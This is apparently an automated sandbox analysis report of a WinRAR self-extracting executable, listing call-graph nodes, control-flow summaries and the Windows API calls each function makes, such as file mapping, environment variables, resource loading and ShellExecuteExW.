__RTC_Initialize 25533 8921e0 26 API calls std::bad_exception::bad_exception 25481 8abee0 GetCommandLineA GetCommandLineW 25412 89eae7 25413 89eaf1 25412->25413 25414 89e85d ___delayLoadHelper2@8 14 API calls 25413->25414 25415 89eafe 25414->25415 25482 89f4e7 29 API calls _abort 25483 8a2cfb 38 API calls 4 library calls 25484 885ef0 82 API calls 25535 8895f0 80 API calls 25536 89fd4f 9 API calls 2 library calls 25430 8a98f0 25438 8aadaf 25430->25438 25433 8a9904 25435 8a990c 25436 8a9919 25435->25436 25446 8a9920 11 API calls 25435->25446 25439 8aac98 _abort 5 API calls 25438->25439 25440 8aadd6 25439->25440 25441 8aadee TlsAlloc 25440->25441 25444 8aaddf 25440->25444 25441->25444 25442 89fbbc CatchGuardHandler 5 API calls 25443 8a98fa 25442->25443 25443->25433 25445 8a9869 20 API calls 2 library calls 25443->25445 25444->25442 25445->25435 25446->25433 25448 8aabf0 25449 8aabfb 25448->25449 25450 8aaf0a 11 API calls 25449->25450 25451 8aac24 25449->25451 25453 8aac20 25449->25453 25450->25449 25454 8aac50 DeleteCriticalSection 25451->25454 25454->25453 25485 8a88f0 7 API calls ___scrt_uninitialize_crt 25487 89a400 GdipDisposeImage GdipFree 25488 89d600 70 API calls 25489 8a6000 QueryPerformanceFrequency QueryPerformanceCounter 25491 8af200 51 API calls 25539 8a2900 6 API calls 4 library calls 25541 8aa700 21 API calls 25543 881710 86 API calls 25544 89ad10 73 API calls 25494 89c220 93 API calls _swprintf 25496 8af421 21 API calls __vswprintf_c_l 25497 881025 29 API calls 25548 89f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25549 89ff30 LocalFree 25499 8ac030 GetProcessHeap 25500 89a440 GdipCloneImage GdipAlloc 25501 8a3a40 5 API calls CatchGuardHandler 25552 8b1f40 CloseHandle 24295 89cd58 24297 89ce22 24295->24297 24302 89cd7b 24295->24302 24305 89c793 _wcslen _wcsrchr 24297->24305 24323 89d78f 24297->24323 24299 89d40a 24301 891fbb CompareStringW 24301->24302 24302->24297 24302->24301 24303 89ca67 SetWindowTextW 24303->24305 24305->24299 24305->24303 24309 89c855 SetFileAttributesW 24305->24309 24314 89cc31 GetDlgItem SetWindowTextW SendMessageW 24305->24314 24317 89cc71 SendMessageW 24305->24317 24322 891fbb CompareStringW 24305->24322 24347 89b314 24305->24347 24351 89a64d GetCurrentDirectoryW 24305->24351 24353 88a5d1 6 API calls 24305->24353 24354 88a55a FindClose 24305->24354 24355 89b48e 76 API calls 2 library calls 24305->24355 24356 8a3e3e 24305->24356 24311 89c90f GetFileAttributesW 24309->24311 24321 89c86f _abort _wcslen 24309->24321 24311->24305 24313 89c921 DeleteFileW 24311->24313 24313->24305 24315 89c932 24313->24315 24314->24305 24316 884092 _swprintf 51 API calls 24315->24316 24318 89c952 GetFileAttributesW 24316->24318 24317->24305 24318->24315 24319 89c967 MoveFileW 24318->24319 24319->24305 24320 89c97f MoveFileExW 24319->24320 24320->24305 24321->24305 24321->24311 24352 88b991 51 API calls 2 library calls 24321->24352 24322->24305 24325 89d799 _abort _wcslen 24323->24325 24324 89d9e7 24324->24305 24325->24324 24326 89d8a5 24325->24326 24327 89d9c0 24325->24327 24372 891fbb CompareStringW 24325->24372 24369 88a231 24326->24369 24327->24324 24331 89d9de ShowWindow 24327->24331 24331->24324 24332 89d8d9 ShellExecuteExW 24332->24324 24337 89d8ec 24332->24337 24334 89d8d1 24334->24332 24335 89d925 24374 89dc3b 6 API calls 24335->24374 24336 89d97b CloseHandle 24338 89d989 24336->24338 24339 89d994 24336->24339 24337->24335 24337->24336 24341 89d91b ShowWindow 24337->24341 24375 891fbb CompareStringW 24338->24375 24339->24327 24341->24335 24343 89d93d 24343->24336 24344 89d950 GetExitCodeProcess 24343->24344 24344->24336 24345 89d963 24344->24345 24345->24336 24348 89b31e 24347->24348 24349 89b3f0 ExpandEnvironmentStringsW 24348->24349 24350 89b40d 24348->24350 24349->24350 24350->24305 24351->24305 24352->24321 24353->24305 24354->24305 24355->24305 24357 8a8e54 24356->24357 24358 8a8e6c 24357->24358 24359 8a8e61 24357->24359 24361 8a8e74 24358->24361 24367 8a8e7d _abort 24358->24367 24384 8a8e06 24359->24384 24362 8a8dcc _free 20 API calls 24361->24362 24365 8a8e69 24362->24365 24363 8a8e82 24391 8a91a8 20 API calls _abort 24363->24391 24364 8a8ea7 HeapReAlloc 24364->24365 24364->24367 24365->24305 24367->24363 24367->24364 24392 8a7a5e 7 API calls 2 library calls 24367->24392 24376 88a243 24369->24376 24372->24326 24373 88b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24373->24334 24374->24343 24375->24339 24377 89ec50 24376->24377 24378 88a250 GetFileAttributesW 24377->24378 24379 88a23a 24378->24379 24380 88a261 24378->24380 24379->24332 24379->24373 24381 88bb03 GetCurrentDirectoryW 24380->24381 24382 88a275 24381->24382 24382->24379 24383 88a279 GetFileAttributesW 24382->24383 24383->24379 24385 8a8e44 24384->24385 24390 8a8e14 _abort 24384->24390 24394 8a91a8 20 API calls _abort 24385->24394 24387 8a8e2f RtlAllocateHeap 24388 8a8e42 24387->24388 24387->24390 24388->24365 24390->24385 24390->24387 24393 8a7a5e 7 API calls 2 library calls 24390->24393 24391->24365 24392->24367 24393->24390 24394->24388 24399 8ac051 31 API calls CatchGuardHandler 25504 89e455 14 API calls ___delayLoadHelper2@8 24436 8a8268 24447 8abb30 24436->24447 24442 8a8dcc _free 20 API calls 24443 8a82ba 24442->24443 24444 8a8290 24445 8a8dcc _free 20 API calls 24444->24445 24446 8a8285 24445->24446 24446->24442 24448 8a827a 24447->24448 24449 8abb39 24447->24449 24451 8abf30 GetEnvironmentStringsW 24448->24451 24464 8aba27 24449->24464 24452 8abf47 24451->24452 24462 8abf9a 24451->24462 24455 8abf4d WideCharToMultiByte 24452->24455 24453 8a827f 24453->24446 24463 8a82c0 26 API calls 3 library calls 24453->24463 24454 8abfa3 FreeEnvironmentStringsW 24454->24453 24456 8abf69 24455->24456 24455->24462 24457 8a8e06 __vswprintf_c_l 21 API calls 24456->24457 24458 8abf6f 24457->24458 24459 8abf8c 24458->24459 24460 8abf76 WideCharToMultiByte 24458->24460 24461 8a8dcc _free 20 API calls 24459->24461 24460->24459 24461->24462 24462->24453 24462->24454 24463->24444 24465 8a97e5 _abort 38 API calls 24464->24465 24466 8aba34 24465->24466 24484 8abb4e 24466->24484 24468 8aba3c 24493 8ab7bb 24468->24493 24471 8aba53 24471->24448 24472 8a8e06 __vswprintf_c_l 21 API calls 24473 8aba64 24472->24473 24483 8aba96 24473->24483 24500 8abbf0 24473->24500 24476 8a8dcc _free 20 API calls 24476->24471 24477 8aba91 24510 8a91a8 20 API calls _abort 24477->24510 24479 8abada 24479->24483 24511 8ab691 26 API calls 24479->24511 24480 8abaae 24480->24479 24481 8a8dcc _free 20 API calls 24480->24481 24481->24479 24483->24476 24485 8abb5a __FrameHandler3::FrameUnwindToState 24484->24485 24486 8a97e5 _abort 38 API calls 24485->24486 24488 8abb64 24486->24488 24489 8abbe8 _abort 24488->24489 24492 8a8dcc _free 20 API calls 24488->24492 24512 8a8d24 38 API calls _abort 24488->24512 24513 8aac31 EnterCriticalSection 24488->24513 24514 8abbdf LeaveCriticalSection _abort 24488->24514 24489->24468 24492->24488 24494 8a4636 __cftof 38 API calls 24493->24494 24495 8ab7cd 24494->24495 24496 8ab7ee 24495->24496 24497 8ab7dc GetOEMCP 24495->24497 24498 8ab805 24496->24498 24499 8ab7f3 GetACP 24496->24499 24497->24498 24498->24471 24498->24472 24499->24498 24501 8ab7bb 40 API calls 24500->24501 24502 8abc0f 24501->24502 24503 8abc85 _abort 24502->24503 24504 8abc16 24502->24504 24506 8abc60 IsValidCodePage 24502->24506 24515 8ab893 GetCPInfo 24503->24515 24505 89fbbc CatchGuardHandler 5 API calls 24504->24505 24507 8aba89 24505->24507 24506->24504 24508 8abc72 GetCPInfo 24506->24508 24507->24477 24507->24480 24508->24503 24508->24504 24510->24483 24511->24483 24513->24488 24514->24488 24521 8ab8cd 24515->24521 24524 8ab977 24515->24524 24518 89fbbc CatchGuardHandler 5 API calls 24520 8aba23 24518->24520 24520->24504 24525 8ac988 24521->24525 24523 8aab78 __vswprintf_c_l 43 API calls 24523->24524 24524->24518 24526 8a4636 __cftof 38 API calls 24525->24526 24527 8ac9a8 MultiByteToWideChar 24526->24527 24529 8ac9e6 24527->24529 24535 8aca7e 24527->24535 24531 8a8e06 __vswprintf_c_l 21 API calls 24529->24531 24536 8aca07 _abort __vsnwprintf_l 24529->24536 24530 89fbbc CatchGuardHandler 5 API calls 24532 8ab92e 24530->24532 24531->24536 24539 8aab78 24532->24539 24533 8aca78 24544 8aabc3 20 API calls _free 24533->24544 24535->24530 24536->24533 24537 8aca4c MultiByteToWideChar 24536->24537 24537->24533 24538 8aca68 GetStringTypeW 24537->24538 24538->24533 24540 8a4636 __cftof 38 API calls 24539->24540 24541 8aab8b 24540->24541 24545 8aa95b 24541->24545 24544->24535 24546 8aa976 __vswprintf_c_l 24545->24546 24547 8aa99c MultiByteToWideChar 24546->24547 24548 8aab50 24547->24548 24549 8aa9c6 24547->24549 24550 89fbbc CatchGuardHandler 5 API calls 24548->24550 24554 8a8e06 __vswprintf_c_l 21 API calls 24549->24554 24556 8aa9e7 __vsnwprintf_l 24549->24556 24551 8aab63 24550->24551 24551->24523 24552 8aaa9c 24581 8aabc3 20 API calls _free 24552->24581 24553 8aaa30 MultiByteToWideChar 24553->24552 24555 8aaa49 24553->24555 24554->24556 24572 8aaf6c 24555->24572 24556->24552 24556->24553 24560 8aaaab 24562 8a8e06 __vswprintf_c_l 21 API calls 24560->24562 24565 8aaacc __vsnwprintf_l 24560->24565 24561 8aaa73 24561->24552 24563 8aaf6c __vswprintf_c_l 11 API calls 24561->24563 24562->24565 24563->24552 24564 8aab41 24580 8aabc3 20 API calls _free 24564->24580 24565->24564 24566 8aaf6c __vswprintf_c_l 11 API calls 24565->24566 24568 8aab20 24566->24568 24568->24564 24569 8aab2f WideCharToMultiByte 24568->24569 24569->24564 24570 8aab6f 24569->24570 24582 8aabc3 20 API calls _free 24570->24582 24573 8aac98 _abort 5 API calls 24572->24573 24574 8aaf93 24573->24574 24577 8aaf9c 24574->24577 24583 8aaff4 10 API calls 3 library calls 24574->24583 24576 8aafdc LCMapStringW 24576->24577 24578 89fbbc CatchGuardHandler 5 API calls 24577->24578 24579 8aaa60 24578->24579 24579->24552 24579->24560 24579->24561 24580->24552 24581->24548 24582->24552 24583->24576 25505 89c793 107 API calls 4 library calls 25554 8a7f6e 52 API calls 2 library calls 25416 889f7a 25417 889f88 25416->25417 25418 889f8f 25416->25418 25419 889f9c GetStdHandle 25418->25419 25423 889fab 25418->25423 25419->25423 25420 88a003 WriteFile 25420->25423 25421 889fcf 25422 889fd4 WriteFile 25421->25422 25421->25423 25422->25421 25422->25423 25423->25417 25423->25420 25423->25421 25423->25422 25425 88a095 25423->25425 25427 886baa 78 API calls 25423->25427 25428 886e98 77 API calls 25425->25428 25427->25423 25428->25417 25507 89a070 10 API calls 25509 89b270 99 API calls 25557 881f72 128 API calls __EH_prolog 25455 889a74 25459 889a7e 25455->25459 25456 889ab1 25457 889b9d SetFilePointer 25457->25456 25458 889bb6 GetLastError 25457->25458 25458->25456 25459->25456 25459->25457 25460 889b79 25459->25460 25461 88981a 79 API calls 25459->25461 25460->25457 25461->25460 25510 881075 84 API calls

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00890863: GetModuleHandleW.KERNEL32(kernel32), ref: 0089087C
                                                                • Part of subcall function 00890863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0089088E
                                                                • Part of subcall function 00890863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008908BF
                                                                • Part of subcall function 0089A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0089A655
                                                                • Part of subcall function 0089AC16: OleInitialize.OLE32(00000000), ref: 0089AC2F
                                                                • Part of subcall function 0089AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0089AC66
                                                                • Part of subcall function 0089AC16: SHGetMalloc.SHELL32(008C8438), ref: 0089AC70
                                                              • GetCommandLineW.KERNEL32 ref: 0089DF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0089DF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0089DF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0089DFCE
                                                                • Part of subcall function 0089DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0089DBF4
                                                                • Part of subcall function 0089DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0089DC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 0089DFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,008DEC90,00000800), ref: 0089DFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,008DEC90), ref: 0089DFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 0089E009
                                                              • _swprintf.LIBCMT ref: 0089E048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0089E05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0089E061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 0089E078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0089E0C9
                                                              • Sleep.KERNEL32(?), ref: 0089E0F7
                                                              • DeleteObject.GDI32 ref: 0089E130
                                                              • DeleteObject.GDI32(?), ref: 0089E140
                                                              • CloseHandle.KERNEL32 ref: 0089E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3049964643-2656992072
                                                              • Opcode ID: 50bbf177a0c1d4752de0bd6c96611ecc1118ac315f10e319bbbc3905e89797a7
                                                              • Instruction ID: 44d4c0a6381a4afd5a59caec010e93da58520958788f4b91c3d948e9d9d8c405
                                                              • Opcode Fuzzy Hash: 50bbf177a0c1d4752de0bd6c96611ecc1118ac315f10e319bbbc3905e89797a7
                                                              • Instruction Fuzzy Hash: C5610671504745AFDB20BBB8EC49F6B3BACFB44711F08052AF945D2292EB789904C762
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 812 89a6c2-89a6df FindResourceW 813 89a7db 812->813 814 89a6e5-89a6f6 SizeofResource 812->814 815 89a7dd-89a7e1 813->815 814->813 816 89a6fc-89a70b LoadResource 814->816 816->813 817 89a711-89a71c LockResource 816->817 817->813 818 89a722-89a737 GlobalAlloc 817->818 819 89a73d-89a746 GlobalLock 818->819 820 89a7d3-89a7d9 818->820 821 89a7cc-89a7cd GlobalFree 819->821 822 89a74c-89a76a call 8a0320 819->822 820->815 821->820 826 89a76c-89a78e call 89a626 822->826 827 89a7c5-89a7c6 GlobalUnlock 822->827 826->827 832 89a790-89a798 826->832 827->821 833 89a79a-89a7ae GdipCreateHBITMAPFromBitmap 832->833 834 89a7b3-89a7c1 832->834 833->834 835 89a7b0 833->835 834->827 835->834
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0089B73D,00000066), ref: 0089A6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A703
                                                              • LockResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A72D
                                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A73E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0089A7C6
                                                                • Part of subcall function 0089A626: GdipAlloc.GDIPLUS(00000010), ref: 0089A62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0089A7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 0089A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                              • String ID: PNG
                                                              • API String ID: 541704414-364855578
                                                              • Opcode ID: 230d806aff37a9e44c19f88d0bc4297c0908803722979f9715c9168ea1fd1020
                                                              • Instruction ID: 568186c7fccadaf1b7930cd158bd8a01e3fdeb46eda0802ea53ce43866c45507
                                                              • Opcode Fuzzy Hash: 230d806aff37a9e44c19f88d0bc4297c0908803722979f9715c9168ea1fd1020
                                                              • Instruction Fuzzy Hash: A6319C75600702BFDB14AF65EC89D2BBBBDFF85760B080619F845D2621EB31DC408AA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1039 88a69b-88a6bf call 89ec50 1042 88a6c1-88a6ce FindFirstFileW 1039->1042 1043 88a727-88a730 FindNextFileW 1039->1043 1044 88a742-88a7ff call 890602 call 88c310 call 8915da * 3 1042->1044 1046 88a6d0-88a6e2 call 88bb03 1042->1046 1043->1044 1045 88a732-88a740 GetLastError 1043->1045 1050 88a804-88a811 1044->1050 1047 88a719-88a722 1045->1047 1054 88a6fe-88a707 GetLastError 1046->1054 1055 88a6e4-88a6fc FindFirstFileW 1046->1055 1047->1050 1057 88a709-88a70c 1054->1057 1058 88a717 1054->1058 1055->1044 1055->1054 1057->1058 1059 88a70e-88a711 1057->1059 1058->1047 1059->1058 1061 88a713-88a715 1059->1061 1061->1047
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6C4
                                                                • Part of subcall function 0088BB03: _wcslen.LIBCMT ref: 0088BB27
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A728
                                                              • GetLastError.KERNEL32(?,?,?,?,0088A592,000000FF,?,?), ref: 0088A734
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: 72e83a86c9728180077c59f84503b9cc75c0898821a2e5bd685ba0d9c6d7d995
                                                              • Instruction ID: 3cdf8b29f4bf99d26ce535fcac8df4cd889aac129fc2fe301692e8a8366f119c
                                                              • Opcode Fuzzy Hash: 72e83a86c9728180077c59f84503b9cc75c0898821a2e5bd685ba0d9c6d7d995
                                                              • Instruction Fuzzy Hash: 7C418F72900519ABCB29FF68CC88AE9B7B8FF48350F144296E559E3240D7346E91DF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002,00000000), ref: 008A7E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002,00000000), ref: 008A7E16
                                                              • ExitProcess.KERNEL32 ref: 008A7E28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 7a8b8316abc23b23e5d4a313fa8025627c9d56d6bc996b7fca909265a42545b5
                                                              • Instruction ID: 3875ad817cac5afd538b9037a6ac41fd74b1f54dab3aa67457dc953bd43935ac
                                                              • Opcode Fuzzy Hash: 7a8b8316abc23b23e5d4a313fa8025627c9d56d6bc996b7fca909265a42545b5
                                                              • Instruction Fuzzy Hash: DEE04632004948ABDF017F28CD09A4A3F6AFF21741B004554F819DA532CB36EEA2DA80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 0cc29cc1c358aa41246163c2f2197f2497d6525f819e7a2a91032bec6a52add2
                                                              • Instruction ID: bead4d911f554bf546afba8befc9c40e74b9f0f5dd5dd7299dd09d78fb874354
                                                              • Opcode Fuzzy Hash: 0cc29cc1c358aa41246163c2f2197f2497d6525f819e7a2a91032bec6a52add2
                                                              • Instruction Fuzzy Hash: 2282E970904245EEDF25EF64C895BFABBB9FF05300F4841B9E949DB182DB315A88CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0089B7E5
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0089B8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 0089B902
                                                              • TranslateMessage.USER32(?), ref: 0089B910
                                                              • DispatchMessageW.USER32(?), ref: 0089B91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0089B93D
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0089B960
                                                              • GetDlgItem.USER32(?,00000068), ref: 0089B983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089B99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089B9B1
                                                                • Part of subcall function 0089D453: _wcslen.LIBCMT ref: 0089D47D
                                                              • SetFocus.USER32(00000000), ref: 0089B9B8
                                                              • _swprintf.LIBCMT ref: 0089BA24
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                                • Part of subcall function 0089D4D4: GetDlgItem.USER32(00000068,008DFCB8), ref: 0089D4E8
                                                                • Part of subcall function 0089D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0089AF07,00000001,?,?,0089B7B9,008B506C,008DFCB8,008DFCB8,00001000,00000000,00000000), ref: 0089D510
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089D51B
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089D529
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D53F
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0089D559
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D59D
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0089D5AB
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D5BA
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D5E1
                                                                • Part of subcall function 0089D4D4: SendMessageW.USER32(00000000,000000C2,00000000,008B43F4), ref: 0089D5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0089BA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0089BA90
                                                              • GetTickCount.KERNEL32 ref: 0089BAAE
                                                              • _swprintf.LIBCMT ref: 0089BAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 0089BAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0089BB43
                                                              • _swprintf.LIBCMT ref: 0089BB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0089BBD0
                                                              • GetCommandLineW.KERNEL32 ref: 0089BBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0089BC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0089BC6F
                                                              • Sleep.KERNEL32(00000064), ref: 0089BCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0089BCE2
